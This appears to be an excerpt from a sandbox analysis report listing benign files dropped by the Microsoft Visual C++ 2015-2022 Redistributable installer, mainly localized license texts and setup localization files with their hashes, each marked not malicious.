                                                                        SHA-512:E3A3693B92873E0B42007616FF6916304EDC5C4F2EEE3E9276F87E86DD94C2BF6E1CF4E895CDF9A1AA0CAC0B381B8840EEE1F491123E901DEE75638B8BC5CE1B
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil Tahoma;}{\f3\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 MICROSOFT-SOFTWARE-LIZENZBEDINGUNGEN\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Diese Lizenzbestimmungen stellen eine Vereinbarung zwischen Ihnen und der Microsoft Corporation (bzw. abh\'e4ngig von Ihrem Wohnsitz einem ihrer Affiliate-Partner) dar. Sie gelten f\'fcr die oben angef\'fchrte Software. Die Bestimmungen gelten ebenso f\'fcr jegliche von Microsoft angebotenen Dienste oder Updates f\'fcr die Software, sofern diesen keine anderen Bestimmungen beiliegen.\par..\b WENN SIE DIESE LIZENZBESTIMMUNGEN EINHALTEN, VERF\'dcGEN SIE \'dcBER DIE NACHFOLGEND AUFGEF\'dcHRTEN RECHTE.\par....\pard{\pntext\f3\'B7\tab}{\*\pn\pnlvlblt\pnf3\pnindent360{\pntxtb\'B7}}\
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3379
                                                                        Entropy (8bit):5.094097800535488
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOZuesXJhDEVTORNxSMoZN3mteNSiNGNsZuiAXEqicMwhPXbhu9KwKlK8Kq:uDiTl3N7xSbu0N8+AhSNnm
                                                                        MD5:561F3F32DB2453647D1992D4D932E872
                                                                        SHA1:109548642FB7C5CC0159BEDDBCF7752B12B264C0
                                                                        SHA-256:8E0DCA6E085744BFCBFF46F7DCBCFA6FBD722DFA52013EE8CEEAF682D7509581
                                                                        SHA-512:CEF8C80BEF8F88208E0751305DF519C3D2F1C84351A71098DC73392EC06CB61A4ACA35182A0822CF6934E8EE42196E2BCFE810CC859965A9F6F393858A1242DF
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] - Setup</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">M.chten Sie den Vorgang wirklich abbrechen?</String>.. <String Id="HelpHeader">Setup-Hilfe</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [Verzeichnis] - installiert, repariert, deinstalliert oder.. erstellt eine vollst.ndige lokale Kopie des Bundles im Verzeichnis. Installieren ist die Standardeinstellung...../passive | /quiet - zeigt eine minimale Benutzeroberfl.che ohne Eingabeaufforderungen oder keine.. Benutzeroberfl.che und keine Eingabeaufforderungen an. Standardm..ig werden die Benutzeroberfl.che und alle Eingab
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):12349
                                                                        Entropy (8bit):5.108676965693909
                                                                        Encrypted:false
                                                                        SSDEEP:384:7Jja9NaNbUmVao9L5EOMjWghxjUSeuDSej2:dj84gmVz9EDjW8GSZC
                                                                        MD5:A6E352E5804313CCDE3E4D5DDDDE122D
                                                                        SHA1:834E3AAA07DC675589A9E5FCD23CE5586C2739E8
                                                                        SHA-256:5C13A65870D770D1642A4259EECB436257CA39016A0500F747BE9C79BE0C7009
                                                                        SHA-512:6578AC6467F61930BC1B20E404441725C63790C65AEC1ACE297429EAD15F50E68D5FE9CC1451AC86AE23DC1A7FE967650166293010D687785FB81FB4492B87C4
                                                                        Malicious:false
                                                                        Preview:{\rtf1\fbidis\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil\fcharset177 Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\ltrpar\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMES DU CONTRAT DE LICENCE LOGICIEL MICROSOFT\par..MICROSOFT VISUAL C++ 2015 - 2022 RUNTIME \par..\b0 Les pr\'e9sentes conditions de licence constituent un contrat entre Microsoft Corporation (ou en fonction de votre lieu de r\'e9sidence, l\f1\rquote\f0 un de ses affili\'e9s) et vous. Ils s\f1\rquote\f0 appliquent au logiciel vis\'e9 ci-dessus. Les termes s\f1\rquote\f0 appliquent \'e9galement \'e0 tout service et \'e0 toute mise \'e0 jour Microsoft pour ce logiciel, \'e0 moins que d\f1\rquote\f0 autres termes n\f1\rquote\f0 accompagnent ces \'e9l\'e9ments.\par..\b SI VOUS VOUS CONFORMEZ AUX PR\'c9SENTS TERMES DU CONTRAT D
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3366
                                                                        Entropy (8bit):5.0912204406356905
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1BesgKLhD1K8cocDSN3m4NlN2ZfNmXL8ePZFcZkLPqUf9fQKRLKeKqZfj:uDiTlABzH1/qt4qgcXY
                                                                        MD5:7B46AE8698459830A0F9116BC27DE7DF
                                                                        SHA1:D9BB14D483B88996A591392AE03E245CAE19C6C3
                                                                        SHA-256:704DDF2E60C1F292BE95C7C79EE48FE8BA8534CEB7CCF9A9EA68B1AD788AE9D4
                                                                        SHA-512:FC536DFADBCD81B42F611AC996059A6264E36ECF72A4AEE7D1E37B87AEFED290CC5251C09B68ED0C8719F655B163AD0782ACD8CE6332ED4AB4046C12D8E6DBF6
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installation de [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Voulez-vous vraiment annuler.?</String>.. <String Id="HelpHeader">Aide du programme d'installation</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installe, r.pare, d.sinstalle ou.. cr.e une copie locale compl.te du groupe dans le r.pertoire. Install est l'option par d.faut...../passive | /quiet - affiche une interface minimale, sans invite, ou n'affiche ni interface.. ni invite. Par d.faut, l'interface et toutes les invites sont affich.es...../norestart - supprime toutes les tentatives de red.
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):11440
                                                                        Entropy (8bit):5.037988271709582
                                                                        Encrypted:false
                                                                        SSDEEP:192:HJdZDQX6UXR2+5AkgS/PhdzerS8QGowHV66zdgkycjGCDLQ+n3YJ258FSiej4LaW:7azAUd+RrR5jjPLQY3YJTSjk42
                                                                        MD5:BC58AD6ABB16B982AEBADC121B37E706
                                                                        SHA1:25E3E4127A643DB5DB2A0B62B02DE871359FAE42
                                                                        SHA-256:70ECF23C03B66A2B18E173332586AFA8F00F91E02A80628F4F9CB2521E27F6AC
                                                                        SHA-512:8340452CB5E196CB1D5DA6DBB3FA8872E519D7903A05331055370B4850D912674F0B6AF3D6E4F94248FE8135EB378EB36969821D711FE1624A04AF13BBE55D70
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 CONDIZIONI DI LICENZA SOFTWARE MICROSOFT\par..RUNTIME MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Le presenti condizioni di licenza costituiscono il contratto tra Microsoft Corporation (o, in base al luogo di residenza del licenziatario, una delle sue consociate) e il licenziatario. Tali condizioni si applicano al software Microsoft di cui sopra. Le condizioni si applicano inoltre a qualsiasi servizio o aggiornamento di Microsoft relativo al software, tranne se accompagnato da condizioni differenti.\par..\b QUALORA IL LICENZIATARIO SI ATTENGA ALLE PRESENTI CONDIZIONI DI LICENZA, DISPORR\'c0 DEI DIRITTI INDICATI DI SEGUITO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3319
                                                                        Entropy (8bit):5.019774955491369
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO1eesy+hD9BOtBFv5Vo8BbQhMNDJN3msNlNohNNz+wcPclM+PAoYKp+K/u:uDiTlfQvo8WutJ/s9FHNOJp
                                                                        MD5:D90BC60FA15299925986A52861B8E5D5
                                                                        SHA1:FADFCA9AB91B1AB4BD7F76132F712357BD6DB760
                                                                        SHA-256:0C57F40CC2091554307AA8A7C35DD38E4596E9513E9EFAE00AC30498EF4E9BC2
                                                                        SHA-512:11764D0E9F286B5AA7B1A9601170833E462A93A1E569A032FCBA9879174305582BD42794D4131B83FBCFBF1CF868A8D5382B11A4BD21F0F7D9B2E87E3C708C3F
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Installazione di [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Annullare?</String>.. <String Id="HelpHeader">Guida alla configurazione</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - installa, ripara, disinstalla o.. crea una copia locale completa del bundle nella directory. L'opzione predefinita . Install...../passive | /quiet - visualizza un'interfaccia utente minima senza prompt oppure non visualizza alcuna interfaccia utente.. n. prompt. Per impostazione predefinita viene visualizzata l'intera interfaccia utente e tutti i prompt...../norestart - annulla quals
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):30228
                                                                        Entropy (8bit):3.785116198512527
                                                                        Encrypted:false
                                                                        SSDEEP:192:I6ZzmL3hCm2AivEiTsk3H1DjM3Lm4nVsO4Uy9C0QueLJkEBN7VvfNSqkO+0TU7B9:VArCQx/2LLW7//72
                                                                        MD5:47C315C54B6F2078875119FA7A718499
                                                                        SHA1:F650DDB5DF2AF2EE7555C410D034B37B9DFD055B
                                                                        SHA-256:C3061A334BFD5F02B7085F8F454D5D3D97D477AF14BAB497BF31A7887BC90C5B
                                                                        SHA-512:A0E4B0FCCCFDD93BAF133C2080403E8719E4A6984237F751BD883C0D3C52D818EFD00F8BA7726A2F645F66286305599403470F14D39EEDC526DDE59228A5F261
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3959
                                                                        Entropy (8bit):5.955167044943003
                                                                        Encrypted:false
                                                                        SSDEEP:96:uDiTlDuB1n+RNmvFo6bnpojeTPk0R/vueX5OA17IHdGWz:5uB1+gD1DU4EdGE
                                                                        MD5:DC81ED54FD28FC6DB6F139C8DA1BDED6
                                                                        SHA1:9C719C32844F78AAE523ADB8EE42A54D019C2B05
                                                                        SHA-256:6B9BBF90D75CFA7D943F036C01602945FE2FA786C6173E22ACB7AFE18375C7EA
                                                                        SHA-512:FD759C42C7740EE9B42EA910D66B0FA3F813600FD29D074BB592E5E12F5EC09DB6B529680E54F7943821CEFE84CE155A151B89A355D99C25A920BF8F254AA008
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.. <Control Control="UninstallButton" X="270" Y="237" Width="120" Height="23"/>.. <Control Control="RepairButton" X="187" Y="237" Width="80" Height="23"/>.. .. <String Id="Caption">[WixBundleName] .......</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">.......?</String>.. <String Id="HelpHeader">..........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ............ ......... .........................
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):28393
                                                                        Entropy (8bit):3.874126830110936
                                                                        Encrypted:false
                                                                        SSDEEP:384:CuQibAmua4XatV1pMxlD1xzjxsZmfmzw4ezN7RQjyeqCBS96My7yNRylDSFrQv90:n4atZClDFsZuheqooMerJlQq/
                                                                        MD5:641D926354F001034CF3F2F3B0FF33DC
                                                                        SHA1:5505107FFF6CF279769A82510276F61EA18637AE
                                                                        SHA-256:3D4E9C165CBEAB829D608106F0E96450F839FFA8ADBD755F0B51867E89DA2AE0
                                                                        SHA-512:B0339664434B096ABC26D600F7657919EF3689B4E0FDFD4EDD8E479859A51EF51BE8F05FA43E25567FFD6C1C2BCC6EF0D7A857B6D666D264C7783BAD3A383D0E
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3249
                                                                        Entropy (8bit):5.985100495461761
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO4TesKOwhDNJCkt1NhEN3m/NFNkbKNdExpVgUnqx6IPaRc0KoUK9TKz0KR:uDiTlUJJCsgqf6YVoz4uU5vI54U5TY
                                                                        MD5:B3399648C2F30930487F20B50378CEC1
                                                                        SHA1:CA7BDAB3BFEF89F6FA3C4AAF39A165D14069FC3D
                                                                        SHA-256:AD7608B87A7135F408ABF54A897A0F0920080F76013314B00D301D6264AE90B2
                                                                        SHA-512:C5B0ECF11F6DADF2E68BC3AA29CC8B24C0158DAE61FE488042D1105341773166C9EBABE43B2AF691AD4D4B458BF4A4BF9689C5722C536439CA3CDC84C0825965
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] .. ....</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">.. ...</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [directory] - ..... ... .. .. .... .., .., .. .... ...... ... .........../passive | /quiet - .... .. .. UI. ..... UI ... ..... .... ..... ..... UI. .. ..... ........../norestart - .. .... .. .... ...
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13352
                                                                        Entropy (8bit):5.359561719031494
                                                                        Encrypted:false
                                                                        SSDEEP:384:Pd0SEvKJ7P9yEw1VAOV/sHm/Iznc2wf6w2:8Jf/sHmAzcaX
                                                                        MD5:F140FD8CA2C63A861D04310257C1B1DB
                                                                        SHA1:7BF7EF763A1F80ECACA692908F8F0790A88C3CA1
                                                                        SHA-256:6F94A99072061012C5626A6DD069809EC841D6E3102B48394D522A0C2E3AA2B5
                                                                        SHA-512:A0BD65AF13CC11E41E5021DF0399E5D21B340EF6C9BBE9B1B56A1766F609CEB031F550A7A0439264B10D67A76A6403E41ABA49B3C9E347CAEDFE9AF0C5BE1EE6
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset238 Tahoma;}{\f2\fnil\fcharset0 Garamond;}{\f3\fnil Tahoma;}{\f4\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 POSTANOWIENIA LICENCYJNE DOTYCZ\f1\'a5CE OPROGRAMOWANIA MICROSOFT\par..\f0 MICROSOFT VISUAL C++ \f1\'8cRODOWISKO URUCHOMIENIOWE 2015-2022 \par..\b0\f0 Niniejsze postanowienia licencyjne stanowi\f1\'b9 umow\'ea mi\'eadzy Microsoft Corporation (lub, w zale\'bfno\'9cci od miejsca zamieszkania Licencjobiorcy, jednym z podmiot\f0\'f3w stowarzyszonych Microsoft Corporation) a Licencjobiorc\f1\'b9. Postanowienia te dotycz\'b9 oprogramowania okre\'9clonego powy\'bfej. Niniejsze postanowienia maj\'b9 r\f0\'f3wnie\f1\'bf zastosowanie do wszelkich us\'b3ug i aktualizacji Microsoft dla niniejszego oprogramowania, z wyj\'b9tkiem tych, kt\f0\'f3rym tow
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3212
                                                                        Entropy (8bit):5.268378763359481
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlOPesar4hDo7zGriQjDCN3mDNN0NrsNGl3vxkIP2hUdKLK0KbK4n6W0sfNM:uDiTlusPGriQw8n2rOij4JsU
                                                                        MD5:15172EAF5C2C2E2B008DE04A250A62A1
                                                                        SHA1:ED60F870C473EE87DF39D1584880D964796E6888
                                                                        SHA-256:440B309FCDF61FFC03B269FE3815C60CB52C6AE3FC6ACAD14EAC04D057B6D6EA
                                                                        SHA-512:48AA89CF4A0B64FF4DCB82E372A01DFF423C12111D35A4D27B6D8DD793FFDE130E0037AB5E4477818A0939F61F7DB25295E4271B8B03F209D8F498169B1F9BAE
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">Instalator [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Czy na pewno chcesz anulowa.?</String>.. <String Id="HelpHeader">Instalator . Pomoc</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [katalog] - Instaluje, naprawia, odinstalowuje.. lub tworzy pe.n. lokaln. kopi. pakietu w katalogu. Domy.lnie jest u.ywany prze..cznik install...../passive | /quiet - Wy.wietla ograniczony interfejs u.ytkownika bez monit.w albo nie wy.wietla ani interfejsu u.ytkownika,.. ani monit.w. Domy.lnie jest wy.wietlany interfejs u.ytkownika oraz wszystkie monity...../norestart - Pom
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):10956
                                                                        Entropy (8bit):5.086757849952268
                                                                        Encrypted:false
                                                                        SSDEEP:192:H2JR4ufWXXFA+YGRjHquAHHoKWCsGlHIpSDDvJRkYhaDznP3l7wLXiBpt32:WJ6ufB+Yc3AnoZCb5AGPQPCLQ72
                                                                        MD5:9A8D2ACF07F3C01E5CBC461AB932D85B
                                                                        SHA1:8781A298DCC14C18C6F6DB58B64F50B2FC6E338E
                                                                        SHA-256:27891EEC899BE859E3B4D3B29247FC6B535D7E836DEF0329111C48741EC6E701
                                                                        SHA-512:A60262A0C18E3BEF7C6D52F242153EBE891F676ED639F2DACFEBBAC86E70EEBF58AA95A7FE1A16E15A553C1BD3ECACCD8677EB9D2761CB79CB9A342C9B4252E2
                                                                        Malicious:false
                                                                        Preview:{\rtf1\ansi\ansicpg1252\deff0\nouicompat\deflang1033{\fonttbl{\f0\fnil\fcharset0 Tahoma;}{\f1\fnil\fcharset0 Garamond;}{\f2\fnil\fcharset2 Symbol;}}..{\colortbl ;\red0\green32\blue96;\red0\green0\blue255;}..{\*\generator Riched20 10.0.19041}\viewkind4\uc1 ..\pard\sb120\sa120\sl240\slmult1\b\f0\fs20\lang9 TERMOS DE LICEN\'c7A PARA SOFTWARE MICROSOFT\par..TEMPO DE EXECU\'c7\'c3O DO MICROSOFT VISUAL C++ 2015 - 2022 \par..\b0 Os presentes termos de licen\'e7a constituem um contrato firmado entre a Microsoft Corporation (ou, dependendo do local no qual voc\'ea esteja domiciliado, uma de suas afiliadas) e voc\'ea. Eles se aplicam ao software indicado acima. Os termos tamb\'e9m se aplicam a quaisquer servi\'e7os ou atualiza\'e7\'f5es da Microsoft para o software, exceto at\'e9 a extens\'e3o de que eles tenham termos diferentes.\par..\b SE VOC\'ca CONCORDAR COM ESTES TERMOS DE LICEN\'c7A, TER\'c1 OS DIREITOS INDICADOS ABAIXO.\par....\pard{\pntext\f2\'B7\tab}{\*\pn\pnlvlblt\pnf2\pnindent360{\pn
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):3095
                                                                        Entropy (8bit):5.150868216959352
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlO5es/4ThDzmU6lDj4N3mBl0N+NWNP4hHCc9skPDXeKKeK9KfKt4eJ2RQdg:uDiTlJhJGl2UsZMLe6
                                                                        MD5:BE27B98E086D2B8068B16DBF43E18D50
                                                                        SHA1:6FAF34A36C8D9DE55650D0466563852552927603
                                                                        SHA-256:F52B54A0E0D0E8F12CBA9823D88E9FD6822B669074DD1DC69DAD6553F7CB8913
                                                                        SHA-512:3B7C773EF72D40A8B123FDB8FC11C4F354A3B152CF6D247F02E494B0770C28483392C76F3C222E3719CF500FE98F535014192ACDDD2ED9EF971718EA3EC0A73E
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.... <String Id="Caption">[WixBundleName] Instala..o</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">Tem certeza de que deseja cancelar?</String>.. <String Id="HelpHeader">Ajuda da Instala..o</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [diret.rio - instala, repara, desinstala ou.. cria uma c.pia local completa do pacote no diret.rio. Install . o padr.o..../passive | /quiet - exibe a IU m.nima sem nenhum prompt ou n.o exibe nenhuma IU e.. nenhum prompt. Por padr.o, a IU e todos os prompts s.o exibidos...../norestart - suprime qualquer tentativa de reiniciar. Por padr.o, a IU perguntar. antes de reiniciar
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):31981
                                                                        Entropy (8bit):3.6408688850128446
                                                                        Encrypted:false
                                                                        SSDEEP:384:GdkM1I1EqW6aAHmxiTJrN6feZ78C7e5zoPqp007FsrmPx/1JRbnS0Yk4SYdIDtx2:Su4Mtg1S0YkjYWZM
                                                                        MD5:62229BE4447C349DF353C5D56372D64B
                                                                        SHA1:989799ED24913A0E6AE2546EE2A9A8D556E1CB3B
                                                                        SHA-256:1BB3FB55B8A13FA3BAFFFE72F5B1ED8B57A63BD4D8654BB6DC5B9011CE803B44
                                                                        SHA-512:FA366328C3FD4F683FDB1C5A64F5D554DE79620331086E8B4CCC2BFC2595B1FDED02CEC8AA982FCD8B13CC175D222AF2D7E2CD1A33B52F36AFD692B533FDBF13
                                                                        Malicious:false
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:XML 1.0 document, Unicode text, UTF-8 text, with CRLF line terminators
                                                                        Category:dropped
                                                                        Size (bytes):4150
                                                                        Entropy (8bit):5.444436038992627
                                                                        Encrypted:false
                                                                        SSDEEP:48:c5DiTlDhQt9esbrohDTWJt49kAr7DHN3m5GNDCNvNLIkflhrWncPingGdZwK1Kqp:uDiTlDYVgmt4xJ88k193ipzjvL
                                                                        MD5:17C652452E5EE930A7F1E5E312C17324
                                                                        SHA1:59F3308B87143D8EA0EA319A1F1A1F5DA5759DD3
                                                                        SHA-256:7333BC8E52548821D82B53DBD7D7C4AA1703C85155480CB83CEFD78380C95661
                                                                        SHA-512:53FD207B96D6BCF0A442E2D90B92E26CBB3ECC6ED71B753A416730E8067E831E9EB32981A9E9368C4CCA16AFBCB2051483FDCFC474EA8F0D652FCA934634FBE8
                                                                        Malicious:false
                                                                        Preview:<?xml version="1.0" encoding="utf-8"?>.. .. Copyright (c) Microsoft Corporation. All rights reserved...-->..<WixLocalization Culture="en-us" xmlns="http://schemas.microsoft.com/wix/2006/localization">.. <Control Control="EulaAcceptCheckbox" X="11" Y="-41" Width="-11" Height="29"/>.. <Control Control="InstallButton" X="275" Y="237" Width="110" Height="23"/>.... <String Id="Caption">......... ......... [WixBundleName]</String>.. <String Id="Title">[WixBundleName]</String>.. <String Id="ConfirmCancelMessage">........?</String>.. <String Id="HelpHeader">....... .. .........</String>.. <String Id="HelpText">/install | /repair | /uninstall | /layout [.......] - ........., .............., ........ ..... ........ ...... ......... ..... ...... . ......... .. ......... - ............../passive | /quiet - ........... ....
                                                                        Process:C:\ProgramData\Package Cache\{d4cecf3b-b68f-4995-8840-52ea0fab646e}\VC_redist.x64.exe
                                                                        File Type:Rich Text Format data, version 1, ANSI, code page 1252, default language ID 1033
                                                                        Category:dropped
                                                                        Size (bytes):13807
                                                                        Entropy (8bit):5.2077828423114045
                                                                        Encrypted:false
                                                                        SSDEEP:192:mfGSPTe1VWjPqkdUxtptACpt4jSzUQBtB7+fzCCnebZ/42W2TEAQjE4oOwuxqrEs:7SK+W6UbACp2SzD9+btebZwZWEdpow2
                                                                        MD5:9625F3A496DBF5E3E0D2F33D417EDBBF
                                                                        SHA1:119376730428812A31B70D58C873866D5307A775
                                                                        SHA-256:F80926604E503697247353F56856B31DE0B3FC1319F1C94068363952549CC9B1
                                                                        SHA-512:DB91A14FC27E3A62324E024DD44E3B5548AF7E1C021201C3D851BD2F32537885AACFC64ADAE619BAC31B60229D1D5FC653F5301CD7187C69BD0ACECCE817D6A3
                                                                        Malicious:false
